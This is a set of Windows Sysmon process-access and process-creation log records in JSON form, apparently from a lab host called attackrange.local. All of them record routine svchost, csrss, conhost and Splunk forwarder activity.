{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A21B0500}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A21B0500}","TargetProcessId":"4132","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.018\r\nSourceProcessGUID: {A837DB8D-0244-5F25-0000-00102BCF0500}\r\nSourceProcessId: 4132\r\nSourceThreadId: 2732\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.018","SourceProcessGUID":"{A837DB8D-0244-5F25-0000-00102BCF0500}","SourceProcessId":"4132","SourceThreadId":"2732","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nProcessGuid: {A837DB8D-0245-5F25-0000-0010CFD00500}\r\nProcessId: 3464\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","ProcessGuid":"{A837DB8D-0245-5F25-0000-0010CFD00500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0245-5F25-0000-0010CFD00500}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0245-5F25-0000-0010CFD00500}","TargetProcessId":"3464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0245-5F25-0000-0010CFD00500}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0245-5F25-0000-0010CFD00500}","TargetProcessId":"3464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:53.550\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:53.550","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
